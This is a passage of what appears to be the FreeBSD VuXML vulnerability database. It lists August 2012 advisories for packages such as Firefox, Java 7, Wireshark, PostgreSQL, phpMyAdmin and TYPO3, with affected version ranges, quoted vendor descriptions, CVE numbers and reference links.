<body xmlns="http://www.w3.org/1999/xhtml">
<p>Asterisk project reports:</p>
<blockquote cite="https://www.asterisk.org/security">
<p>Asterisk Manager User Unauthorized Shell Access</p>
<p>ACL rules ignored when placing outbound calls by certain IAX2
users</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-2186</cvename>
<cvename>CVE-2012-4737</cvename>
<url>http://downloads.digium.com/pub/security/AST-2012-012.html</url>
<url>http://downloads.digium.com/pub/security/AST-2012-013.html</url>
<url>https://www.asterisk.org/security</url>
</references>
<dates>
<discovery>2012-08-30</discovery>
<entry>2012-08-30</entry>
</dates>
</vuln>
<vuln vid="2b8cad90-f289-11e1-a215-14dae9ebcf89">
<topic>mozilla -- multiple vulnerabilities</topic>
<affects>
<package>
<name>firefox</name>
<range><gt>11.0,1</gt><lt>15.0,1</lt></range>
<range><lt>10.0.7,1</lt></range>
</package>
<package>
<name>linux-firefox</name>
<range><lt>10.0.7,1</lt></range>
</package>
<package>
<name>linux-seamonkey</name>
<range><lt>2.12</lt></range>
</package>
<package>
<name>linux-thunderbird</name>
<range><lt>10.0.7</lt></range>
</package>
<package>
<name>seamonkey</name>
<range><lt>2.12</lt></range>
</package>
<package>
<name>thunderbird</name>
<range><gt>11.0</gt><lt>15.0</lt></range>
<range><lt>10.0.7</lt></range>
</package>
<package>
<name>libxul</name>
<range><gt>1.9.2.*</gt><lt>10.0.7</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>The Mozilla Project reports:</p>
<blockquote cite="http://www.mozilla.org/security/known-vulnerabilities/">
<p>MFSA 2012-57 Miscellaneous memory safety hazards (rv:15.0/
rv:10.0.7)</p>
<p>MFSA 2012-58 Use-after-free issues found using Address
Sanitizer</p>
<p>MFSA 2012-59 Location object can be shadowed using
Object.defineProperty</p>
<p>MFSA 2012-60 Escalation of privilege through about:newtab</p>
<p>MFSA 2012-61 Memory corruption with bitmap format images with
negative height</p>
<p>MFSA 2012-62 WebGL use-after-free and memory corruption</p>
<p>MFSA 2012-63 SVG buffer overflow and use-after-free issues</p>
<p>MFSA 2012-64 Graphite 2 memory corruption</p>
<p>MFSA 2012-65 Out-of-bounds read in format-number in XSLT</p>
<p>MFSA 2012-66 HTTPMonitor extension allows for remote debugging
without explicit activation</p>
<p>MFSA 2012-67 Installer will launch incorrect executable following
new installation</p>
<p>MFSA 2012-68 DOMParser loads linked resources in extensions when
parsing text/html</p>
<p>MFSA 2012-69 Incorrect site SSL certificate data display</p>
<p>MFSA 2012-70 Location object security checks bypassed by chrome
code</p>
<p>MFSA 2012-71 Insecure use of __android_log_print</p>
<p>MFSA 2012-72 Web console eval capable of executing
chrome-privileged code</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-1956</cvename>
<cvename>CVE-2012-1970</cvename>
<cvename>CVE-2012-1971</cvename>
<cvename>CVE-2012-1972</cvename>
<cvename>CVE-2012-1973</cvename>
<cvename>CVE-2012-1974</cvename>
<cvename>CVE-2012-1975</cvename>
<cvename>CVE-2012-1976</cvename>
<cvename>CVE-2012-3956</cvename>
<cvename>CVE-2012-3957</cvename>
<cvename>CVE-2012-3958</cvename>
<cvename>CVE-2012-3959</cvename>
<cvename>CVE-2012-3960</cvename>
<cvename>CVE-2012-3961</cvename>
<cvename>CVE-2012-3962</cvename>
<cvename>CVE-2012-3963</cvename>
<cvename>CVE-2012-3964</cvename>
<cvename>CVE-2012-3965</cvename>
<cvename>CVE-2012-3966</cvename>
<cvename>CVE-2012-3967</cvename>
<cvename>CVE-2012-3968</cvename>
<cvename>CVE-2012-3969</cvename>
<cvename>CVE-2012-3970</cvename>
<cvename>CVE-2012-3971</cvename>
<cvename>CVE-2012-3972</cvename>
<cvename>CVE-2012-3973</cvename>
<cvename>CVE-2012-3974</cvename>
<cvename>CVE-2012-3975</cvename>
<cvename>CVE-2012-3976</cvename>
<cvename>CVE-2012-3978</cvename>
<cvename>CVE-2012-3979</cvename>
<cvename>CVE-2012-3980</cvename>
<url>http://www.mozilla.org/security/known-vulnerabilities/</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-57.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-58.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-59.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-60.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-61.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-62.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-63.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-64.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-65.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-66.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-67.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-68.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-69.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-70.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-71.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-72.html</url>
</references>
<dates>
<discovery>2012-08-28</discovery>
<entry>2012-08-30</entry>
</dates>
</vuln>
<vuln vid="6dd5e45c-f084-11e1-8d0f-406186f3d89d">
<topic>coppermine -- Multiple vulnerabilities</topic>
<affects>
<package>
<name>coppermine</name>
<range><lt>1.5.20</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>The Coppermine Team reports:</p>
<blockquote cite="http://forum.coppermine-gallery.net/index.php/topic,74682.0.html">
<p>The release covers several path disclosure vulnerabilities. If
unpatched, it's possible to generate an error that will reveal the
full path of the script. A remote user can determine the full path
to the web root directory and other potentially sensitive
information. Furthermore, the release covers a recently discovered
XSS vulnerability that allows (if unpatched) a malevolent visitor to
include own script routines under certain conditions.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-1613</cvename>
<cvename>CVE-2012-1614</cvename>
<mlist>http://seclists.org/oss-sec/2012/q2/11</mlist>
<url>http://forum.coppermine-gallery.net/index.php/topic,74682.0.html</url>
</references>
<dates>
<discovery>2012-03-29</discovery>
<entry>2012-08-30</entry>
</dates>
</vuln>
<vuln vid="16846d1e-f1de-11e1-8bd8-0022156e8794">
<topic>Java 1.7 -- security manager bypass</topic>
<affects>
<package>
<name>openjdk</name>
<range><ge>7.0</ge><lt>7.6.24_1</lt></range>
</package>
<package>
<name>linux-sun-jdk</name>
<range><ge>7.0</ge><lt>7.7</lt></range>
</package>
<package>
<name>linux-sun-jre</name>
<range><ge>7.0</ge><lt>7.7</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>US-CERT reports:</p>
<blockquote cite="http://www.kb.cert.org/vuls/id/636312">
<p>Oracle Java Runtime Environment (JRE) 1.7 contains a
vulnerability that may allow an applet to call
setSecurityManager in a way that allows setting of arbitrary
permissions.</p>
<p>By leveraging the public, privileged getField() function,
an untrusted Java applet can escalate its privileges by
calling the setSecurityManager() function to allow full
privileges, without requiring code signing.</p>
<p>This vulnerability is being actively exploited in the
wild, and exploit code is publicly available.</p>
</blockquote>
<p>This exploit does not only affect Java applets, but every
piece of software that relies on the Java Security Manager for
sandboxing executable code is affected: malicious code can
totally disable Security Manager.</p>
</body>
</description>
<references>
<cvename>CVE-2012-4681</cvename>
<certvu>636312</certvu>
<url>http://www.deependresearch.org/2012/08/java-7-vulnerability-analysis.html</url>
<url>http://mail.openjdk.java.net/pipermail/distro-pkg-dev/2012-August/020065.html</url>
<url>http://www.oracle.com/technetwork/topics/security/alert-cve-2012-4681-1835715.html</url>
</references>
<dates>
<discovery>2012-08-27</discovery>
<entry>2012-08-30</entry>
<modified>2012-08-31</modified>
</dates>
</vuln>
<vuln vid="18ce9a90-f269-11e1-be53-080027ef73ec">
<topic>fetchmail -- chosen plaintext attack against SSL CBC initialization vectors</topic>
<affects>
<package>
<name>fetchmail</name>
<range><ge>6.3.9</ge><lt>6.3.22</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Matthias Andree reports:</p>
<blockquote cite="http://www.fetchmail.info/fetchmail-SA-2012-01.txt">
<p>Fetchmail version 6.3.9 enabled "all SSL workarounds" (SSL_OP_ALL)
which contains a switch to disable a countermeasure against certain
attacks against block ciphers that permit guessing the
initialization vectors, providing that an attacker can make the
application (fetchmail) encrypt some data for him -- which is not
easily the case.</p>
<p>Stream ciphers (such as RC4) are unaffected.</p>
<p>Credits to Apple Product Security for reporting this.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2011-3389</cvename>
</references>
<dates>
<discovery>2012-01-19</discovery>
<entry>2012-08-30</entry>
</dates>
</vuln>
<vuln vid="c906e0a4-efa6-11e1-8fbf-001b77d09812">
<topic>roundcube -- cross-site scripting in HTML email messages</topic>
<affects>
<package>
<name>roundcube</name>
<range><ge>0.8.0,1</ge><lt>0.8.1,1</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>RoundCube branch 0.8.x prior to the version 0.8.1 is prone
to the cross-scripting attack (XSS) originating from incoming
HTML e-mails: due to the lack of proper sanitization
of JavaScript code inside the "href" attribute, sender
could launch XSS attack when recipient opens the message
in RoundCube interface.</p>
</body>
</description>
<references>
<cvename>CVE-2012-3508</cvename>
<url>http://trac.roundcube.net/wiki/Changelog</url>
<url>http://trac.roundcube.net/ticket/1488613</url>
</references>
<dates>
<discovery>2012-08-14</discovery>
<entry>2012-08-27</entry>
</dates>
</vuln>
<vuln vid="aa4d3d73-ef17-11e1-b593-00269ef07d24">
<topic>Calligra, KOffice -- input validation failure</topic>
<affects>
<package>
<name>koffice</name>
<range><le>1.6.3_18,2</le></range>
</package>
<package>
<name>koffice-kde4</name>
<range><le>2.3.3_7</le></range>
</package>
<package>
<name>calligra</name>
<range><lt>2.5.0</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>KDE Security Advisory reports:</p>
<blockquote cite="http://www.kde.org/info/security/advisory-20120810-1.txt">
<p>A flaw has been found which can allow malicious code to take
advantage of an input validation failure in the Microsoft import
filter in Calligra and KOffice. Exploitation can allow the attacker
to gain control of the running process and execute code on its
behalf.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-3455</cvename>
<cvename>CVE-2012-3456</cvename>
<url>http://www.kde.org/info/security/advisory-20120810-1.txt</url>
<url>http://media.blackhat.com/bh-us-12/Briefings/C_Miller/BH_US_12_Miller_NFC_attack_surface_WP.pdf</url>
</references>
<dates>
<discovery>2012-08-10</discovery>
<entry>2012-08-26</entry>
</dates>
</vuln>
<vuln vid="ce680f0a-eea6-11e1-8bd8-0022156e8794">
<topic>squidclamav -- cross-site scripting in default virus warning pages</topic>
<affects>
<package>
<name>squidclamav</name>
<range><lt>5.8</lt></range>
<range><ge>6.0</ge><lt>6.7</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>SquidClamav developers report:</p>
<blockquote cite="http://squidclamav.darold.net/news.html">
<p>This release fix several security issues by escaping CGI
parameters.</p>
</blockquote>
<p>Prior to versions 6.7 and 5.8, CGI script clwarn.cgi was not
properly sanitizing input variables, so they could be used to
inject arbitrary strings to the generated page, leading
to the cross-site scripting attacks.</p>
</body>
</description>
<references>
<cvename>CVE-2012-4667</cvename>
<url>http://squidclamav.darold.net/news.html</url>
</references>
<dates>
<discovery>2012-07-24</discovery>
<entry>2012-08-25</entry>
</dates>
</vuln>
<vuln vid="8defa0f9-ee8a-11e1-8bd8-0022156e8794">
<topic>squidclamav -- Denial of Service</topic>
<affects>
<package>
<name>squidclamav</name>
<range><lt>5.7_1</lt></range>
<range><ge>6.0</ge><lt>6.7</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>SquidClamav developers report:</p>
<blockquote cite="http://squidclamav.darold.net/news.html">
<p>Add a workaround for a squidGuard bug that unescape
the URL and send it back unescaped. This result in garbage
staying into pipe of the system command call and could crash
squidclamav on next read or return false information.
This is specially true with URL containing the %0D or %0A
character.</p>
</blockquote>
<p>This vulnerability can be triggered only in configurations
where external chained URL checker is configured via
"squidguard" directive.</p>
</body>
</description>
<references>
<cvename>CVE-2012-3501</cvename>
<url>http://squidclamav.darold.net/news.html</url>
</references>
<dates>
<discovery>2012-07-24</discovery>
<entry>2012-08-25</entry>
<modified>2012-09-04</modified>
</dates>
</vuln>
<vuln vid="a7975581-ee26-11e1-8bd8-0022156e8794">
<topic>inn -- plaintext command injection into encrypted channel</topic>
<affects>
<package>
<name>inn</name>
<range><lt>2.5.2_2</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>INN developers report:</p>
<blockquote cite="https://www.isc.org/software/inn/2.5.3article">
<p>Fixed a possible plaintext command injection during the
negotiation of a TLS layer. The vulnerability detailed
in CVE-2011-0411 affects the STARTTLS and AUTHINFO SASL
commands. nnrpd now resets its read buffer upon
a successful negotiation of a TLS layer. It prevents
malicious commands, sent unencrypted, from being executed
in the new encrypted state of the session.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-3523</cvename>
<cvename>CVE-2011-0411</cvename>
<url>https://www.isc.org/software/inn/2.5.3article</url>
</references>
<dates>
<discovery>2012-08-14</discovery>
<entry>2012-08-25</entry>
</dates>
</vuln>
<vuln vid="4d1d2f6d-ec94-11e1-8bd8-0022156e8794">
<topic>jabberd -- domain spoofing in server dialback protocol</topic>
<affects>
<package>
<name>jabberd</name>
<range><lt>2.2.16_2</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>XMPP Standards Foundation reports:</p>
<blockquote cite="http://xmpp.org/resources/security-notices/server-dialback/">
<p>Some implementations of the XMPP Server Dialback protocol
(RFC 3920/XEP-0220) have not been checking dialback
responses to ensure that validated results are correlated
with requests.</p>
<p>An attacking server could spoof one or more domains in
communicating with a vulnerable server implementation,
thereby avoiding the protections built into the Server
Dialback protocol.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-3525</cvename>
<url>http://xmpp.org/resources/security-notices/server-dialback/</url>
</references>
<dates>
<discovery>2012-08-21</discovery>
<entry>2012-08-23</entry>
</dates>
</vuln>
<vuln vid="a4598875-ec91-11e1-8bd8-0022156e8794">
<topic>rssh -- configuration restrictions bypass</topic>
<affects>
<package>
<name>rssh</name>
<range><lt>2.3.3</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Derek Martin (rssh maintainer) reports:</p>
<blockquote cite="http://www.pizzashack.org/rssh/security.shtml">
<p>John Barber reported a problem where, if the system
administrator misconfigures rssh by providing too few access
bits in the configuration file, the user will be given
default permissions (scp) to the entire system, potentially
circumventing any configured chroot. Fixing this required a
behavior change: in the past, using rssh without a config
file would give all users default access to use scp on an
unchrooted system. In order to correct the reported bug,
this feature has been eliminated, and you must now have a
valid configuration file. If no config file exists, all
users will be locked out.</p>
</blockquote>
</body>
</description>
<references>
<url>http://www.pizzashack.org/rssh/security.shtml</url>
</references>
<dates>
<discovery>2010-08-01</discovery>
<entry>2012-08-22</entry>
</dates>
</vuln>
<vuln vid="65b25acc-e63b-11e1-b81c-001b77d09812">
<topic>rssh -- arbitrary command execution</topic>
<affects>
<package>
<name>rssh</name>
<range><lt>2.3.4</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Derek Martin (rssh maintainer) reports:</p>
<blockquote cite="http://sourceforge.net/mailarchive/message.php?msg_id=29235647">
<p>Henrik Erkkonen has discovered that, through clever
manipulation of environment variables on the ssh command
line, it is possible to circumvent rssh. As far as I can
tell, there is no way to effect a root compromise, except of
course if the root account is the one you're attempting to
protect with rssh...</p>
</blockquote>
</body>
</description>
<references>
<bid>53430</bid>
<cvename>CVE-2012-3478</cvename>
<url>http://sourceforge.net/mailarchive/message.php?msg_id=29235647</url>
</references>
<dates>
<discovery>2012-05-08</discovery>
<entry>2012-08-22</entry>
</dates>
</vuln>
<vuln vid="c651c898-e90d-11e1-b230-0024e830109b">
<topic>libotr -- buffer overflows</topic>
<affects>
<package>
<name>libotr</name>
<range><lt>3.2.1</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>OTR developers report:</p>
<blockquote cite="http://lists.cypherpunks.ca/pipermail/otr-dev/2012-July/001347.html">
<p>The otrl_base64_otr_decode() function and similar functions within OTR
suffer from buffer overflows in the case of malformed input;
specifically if a message of the format of "?OTR:===." is received
then a zero-byte allocation is performed without a similar correlation
between the subsequent base64 decoding write, as such it becomes
possible to write between zero and three bytes incorrectly to the
heap, albeit only with a value of '='.</p>
<p>Because this code path is highly utilized, specifically in the
reception of instant messages over pidgin or similar, this
vulnerability is considered severe even though in many platforms and
circumstances the bug would yield an unexploitable state and result
simply in denial of service.</p>
<p>The developers of OTR promptly fixed the errors and users of OTR are
advised to upgrade the software at the next release cycle.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-3461</cvename>
<url>http://lists.cypherpunks.ca/pipermail/otr-dev/2012-July/001347.html</url>
</references>
<dates>
<discovery>2012-07-27</discovery>
<entry>2012-08-18</entry>
</dates>
</vuln>
<vuln vid="0f62be39-e8e0-11e1-bea0-002354ed89bc">
<topic>OpenTTD -- Denial of Service</topic>
<affects>
<package>
<name>openttd</name>
<range><le>1.2.1</le></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>The OpenTTD Team reports:</p>
<blockquote cite="http://security.openttd.org/en/CVE-2012-3436">
<p>Denial of service (server) using ships on half tiles and
landscaping.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-3436</cvename>
<url>http://security.openttd.org/en/CVE-2012-3436</url>
</references>
<dates>
<discovery>2012-07-25</discovery>
<entry>2012-08-18</entry>
</dates>
</vuln>
<vuln vid="4cdfe875-e8d6-11e1-bea0-002354ed89bc">
<topic>Wireshark -- Multiple vulnerabilities</topic>
<affects>
<package>
<name>wireshark</name>
<range><lt>1.8.2</lt></range>
</package>
<package>
<name>wireshark-lite</name>
<range><lt>1.8.2</lt></range>
</package>
<package>
<name>tshark</name>
<range><lt>1.8.2</lt></range>
</package>
<package>
<name>tshark-lite</name>
<range><lt>1.8.2</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Wireshark reports:</p>
<blockquote cite="http://www.wireshark.org/docs/relnotes/wireshark-1.8.2.html">
<p>It may be possible to make Wireshark crash by injecting a
malformed packet onto the wire or by convincing someone to read a
malformed packet trace file.</p>
<p>It may be possible to make Wireshark consume excessive CPU
resources by injecting a malformed packet onto the wire or by
convincing someone to read a malformed packet trace file.</p>
<p>The PPP dissector could crash.</p>
<p>The NFS dissector could use excessive amounts of CPU.</p>
<p>The DCP ETSI dissector could trigger a zero division.</p>
<p>The MongoDB dissector could go into a large loop.</p>
<p>The XTP dissector could go into an infinite loop.</p>
<p>The ERF dissector could overflow a buffer.</p>
<p>The AFP dissector could go into a large loop.</p>
<p>The RTPS2 dissector could overflow a buffer.</p>
<p>The GSM RLC MAC dissector could overflow a buffer.</p>
<p>The CIP dissector could exhaust system memory.</p>
<p>The STUN dissector could crash.</p>
<p>The EtherCAT Mailbox dissector could abort.</p>
<p>The CTDB dissector could go into a large loop.</p>
<p>The pcap-ng file parser could trigger a zero division.</p>
<p>The Ixia IxVeriWave file parser could overflow a buffer.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-4048</cvename>
<cvename>CVE-2012-4049</cvename>
<cvename>CVE-2012-4285</cvename>
<cvename>CVE-2012-4286</cvename>
<cvename>CVE-2012-4287</cvename>
<cvename>CVE-2012-4288</cvename>
<cvename>CVE-2012-4289</cvename>
<cvename>CVE-2012-4290</cvename>
<cvename>CVE-2012-4291</cvename>
<cvename>CVE-2012-4292</cvename>
<cvename>CVE-2012-4293</cvename>
<cvename>CVE-2012-4294</cvename>
<cvename>CVE-2012-4295</cvename>
<cvename>CVE-2012-4296</cvename>
<cvename>CVE-2012-4297</cvename>
<cvename>CVE-2012-4298</cvename>
<url>http://www.wireshark.org/security/wnpa-sec-2012-11.html</url>
<url>http://www.wireshark.org/security/wnpa-sec-2012-12.html</url>
<url>http://www.wireshark.org/security/wnpa-sec-2012-13.html</url>
<url>http://www.wireshark.org/security/wnpa-sec-2012-14.html</url>
<url>http://www.wireshark.org/security/wnpa-sec-2012-15.html</url>
<url>http://www.wireshark.org/security/wnpa-sec-2012-16.html</url>
<url>http://www.wireshark.org/security/wnpa-sec-2012-17.html</url>
<url>http://www.wireshark.org/security/wnpa-sec-2012-18.html</url>
<url>http://www.wireshark.org/security/wnpa-sec-2012-19.html</url>
<url>http://www.wireshark.org/security/wnpa-sec-2012-20.html</url>
<url>http://www.wireshark.org/security/wnpa-sec-2012-21.html</url>
<url>http://www.wireshark.org/security/wnpa-sec-2012-22.html</url>
<url>http://www.wireshark.org/security/wnpa-sec-2012-23.html</url>
<url>http://www.wireshark.org/security/wnpa-sec-2012-24.html</url>
<url>http://www.wireshark.org/security/wnpa-sec-2012-25.html</url>
</references>
<dates>
<discovery>2012-07-22</discovery>
<entry>2012-08-18</entry>
</dates>
</vuln>
<vuln vid="07234e78-e899-11e1-b38d-0023ae8e59f0">
<topic>databases/postgresql*-server -- multiple vulnerabilities</topic>
<affects>
<package>
<name>postgresql-server</name>
<range><gt>8.3.*</gt><lt>8.3.20</lt></range>
<range><gt>8.4.*</gt><lt>8.4.13</lt></range>
<range><gt>9.0.*</gt><lt>9.0.9</lt></range>
<range><gt>9.1.*</gt><lt>9.1.5</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>The PostgreSQL Global Development Group reports:</p>
<blockquote cite="http://www.postgresql.org/about/news/1407/">
<p>The PostgreSQL Global Development Group today released
security updates for all active branches of the PostgreSQL
database system, including versions 9.1.5, 9.0.9, 8.4.13 and
8.3.20. This update patches security holes associated with
libxml2 and libxslt, similar to those affecting other open
source projects. All users are urged to update their
installations at the first available opportunity</p>
<p>Users who are relying on the built-in XML functionality to
validate external DTDs will need to implement a workaround, as
this security patch disables that functionality. Users who are
using xslt_process() to fetch documents or stylesheets from
external URLs will no longer be able to do so. The PostgreSQL
project regrets the need to disable both of these features in
order to maintain our security standards. These security issues
with XML are substantially similar to issues patched recently
by the Webkit (CVE-2011-1774), XMLsec (CVE-2011-1425) and PHP5
(CVE-2012-0057) projects.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-3488</cvename>
<cvename>CVE-2012-3489</cvename>
<url>http://www.postgresql.org/about/news/1407/</url>
</references>
<dates>
<discovery>2012-08-17</discovery>
<entry>2012-08-17</entry>
</dates>
</vuln>
<vuln vid="db1d3340-e83b-11e1-999b-e0cb4e266481">
<topic>phpMyAdmin -- Multiple XSS in Table operations, Database structure, Trigger and Visualize GIS data pages</topic>
<affects>
<package>
<name>phpMyAdmin</name>
<range><lt>3.5.2.2</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>The phpMyAdmin development team reports:</p>
<blockquote cite="http://www.phpmyadmin.net/home_page/security/PMASA-2012-4.php">
<p>Using a crafted table name, it was possible to produce a
XSS : 1) On the Database Structure page, creating a new
table with a crafted name 2) On the Database Structure page,
using the Empty and Drop links of the crafted table name 3)
On the Table Operations page of a crafted table, using the
'Empty the table (TRUNCATE)' and 'Delete the table (DROP)'
links 4) On the Triggers page of a database containing
tables with a crafted name, when opening the 'Add Trigger'
popup 5) When creating a trigger for a table with a crafted
name, with an invalid definition. Having crafted data in a
database table, it was possible to produce a XSS : 6) When
visualizing GIS data, having a crafted label name.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-4345</cvename>
<url>http://www.phpmyadmin.net/home_page/security/PMASA-2012-4.php</url>
</references>
<dates>
<discovery>2012-08-12</discovery>
<entry>2012-08-17</entry>
</dates>
</vuln>
<vuln vid="48bcb4b2-e708-11e1-a59d-000d601460a4">
<topic>typo3 -- Multiple vulernabilities in TYPO3 Core</topic>
<affects>
<package>
<name>typo3</name>
<range><ge>4.5.0</ge><lt>4.5.19</lt></range>
<range><ge>4.6.0</ge><lt>4.6.12</lt></range>
<range><ge>4.7.0</ge><lt>4.7.4</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Typo Security Team reports:</p>
<blockquote cite="https://typo3.org/teams/security/security-bulletins/typo3-core/typo3-core-sa-2012-004/">
<p>It has been discovered that TYPO3 Core is vulnerable to Cross-Site
Scripting, Information Disclosure, Insecure Unserialize leading to
Arbitrary Code Execution.</p>
<p>TYPO3 Backend Help System - Due to a missing signature (HMAC) for a
parameter in the view_help.php file, an attacker could unserialize
arbitrary objects within TYPO3. We are aware of a working exploit,
which can lead to arbitrary code execution. A valid backend user
login or multiple successful cross site request forgery attacks are
required to exploit this vulnerability.</p>
<p>TYPO3 Backend - Failing to properly HTML-encode user input in
several places, the TYPO3 backend is susceptible to Cross-Site
Scripting. A valid backend user is required to exploit these
vulnerabilities.</p>
<p>TYPO3 Backend - Accessing the configuration module discloses the
Encryption Key. A valid backend user with access to the
configuration module is required to exploit this vulnerability.</p>
<p>TYPO3 HTML Sanitizing API - By not removing several HTML5
JavaScript events, the API method t3lib_div::RemoveXSS() fails to
filter specially crafted HTML injections, thus is susceptible to
Cross-Site Scripting. Failing to properly encode for JavaScript the
API method t3lib_div::quoteJSvalue(), it is susceptible to Cross-Site
Scripting.</p>
<p>TYPO3 Install Tool - Failing to properly sanitize user input, the
Install Tool is susceptible to Cross-Site Scripting.</p>
</blockquote>
</body>
</description>
<references>
<url>https://typo3.org/teams/security/security-bulletins/typo3-core/typo3-core-sa-2012-004/</url>
</references>
<dates>
<discovery>2012-08-15</discovery>
<entry>2012-08-15</entry>
</dates>
</vuln>
<vuln vid="83f9e943-e664-11e1-a66d-080027ef73ec">
<topic>fetchmail -- two vulnerabilities in NTLM authentication</topic>
<affects>
<package>
<name>fetchmail</name>
<range><ge>5.0.8</ge><lt>6.3.21_1</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Matthias Andree reports:</p>
<blockquote cite="http://www.fetchmail.info/fetchmail-SA-2012-02.txt">
<p>With NTLM support enabled, fetchmail might mistake a server-side
error message during NTLM protocol exchange for protocol data,
leading to a SIGSEGV.</p>
<p>Also, with a carefully crafted NTLM challenge, a malicious server
might cause fetchmail to read from a bad memory location, betraying
confidential data. It is deemed hard, although not impossible, to
steal other accounts' data.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-3482</cvename>
</references>
<dates>
<discovery>2012-08-12</discovery>
<entry>2012-08-14</entry>
<modified>2012-08-27</modified>
</dates>
</vuln>
<vuln vid="55b498e2-e56c-11e1-bbd5-001c25e46b1d">
<topic>Several vulnerabilities found in IcedTea-Web</topic>
<affects>
<package>
<name>icedtea-web</name>
<range><lt>1.2.1</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>The IcedTea project team reports:</p>
<blockquote cite="https://bugzilla.redhat.com/show_bug.cgi?id=840592">
<p>CVE-2012-3422: Use of uninitialized instance pointers</p>
<p>An uninitialized pointer use flaw was found in IcedTea-Web web
browser plugin. A malicious web page could use this flaw make
IcedTea-Web browser plugin pass invalid pointer to a web browser.
Depending on the browser used, it may cause the browser to crash
or possibly execute arbitrary code.</p>
<p>The get_cookie_info() and get_proxy_info() call
getFirstInTableInstance() with the instance_to_id_map hash as
a parameter. If instance_to_id_map is empty (which can happen
when plugin was recently removed), getFirstInTableInstance()
returns an uninitialized pointer.</p>
</blockquote>
<blockquote cite="https://bugzilla.redhat.com/show_bug.cgi?id=841345">
<p>CVE-2012-3423: Incorrect handling of non 0-terminated strings</p>
<p>It was discovered that the IcedTea-Web web browser plugin
incorrectly assumed that all strings provided by browser are NUL
terminated, which is not guaranteed by the NPAPI (Netscape Plugin
Application Programming Interface). When used in a browser that
does not NUL terminate NPVariant NPStrings, this could lead to
buffer over-read or over-write, resulting in possible information
leak, crash, or code execution.</p>
<p>Mozilla browsers currently NUL terminate strings, however recent
Chrome versions are known not to provide NUL terminated data.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-3422</cvename>
<cvename>CVE-2012-3423</cvename>
<mlist>http://mail.openjdk.java.net/pipermail/distro-pkg-dev/2012-July/019580.html</mlist>
</references>
<dates>
<discovery>2012-07-31</discovery>
<entry>2012-08-13</entry>
</dates>
</vuln>
<vuln vid="a14dee30-e3d7-11e1-a084-50e5492bd3dc">
<topic>libcloud -- possible SSL MITM due to invalid regexp used to validate target server hostname</topic>
<affects>
<package>
<name>py-libcloud</name>
<range><lt>0.11.1</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>The libcloud development team reports:</p>
<blockquote cite="http://libcloud.apache.org/security.html">
<p>When establishing a secure (SSL / TLS) connection to a target server an invalid regular
expression has been used for performing the hostname verification. Subset instead of the
full target server hostname has been marked an an acceptable match for the given hostname.
For example, certificate with a hostname field of "aexample.com" was considered a valid
certificate for domain "example.com".</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-3446</cvename>
<url>http://seclists.org/fulldisclosure/2012/Aug/55</url>
</references>
<dates>
<discovery>2012-08-01</discovery>
<entry>2012-08-11</entry>
</dates>
</vuln>
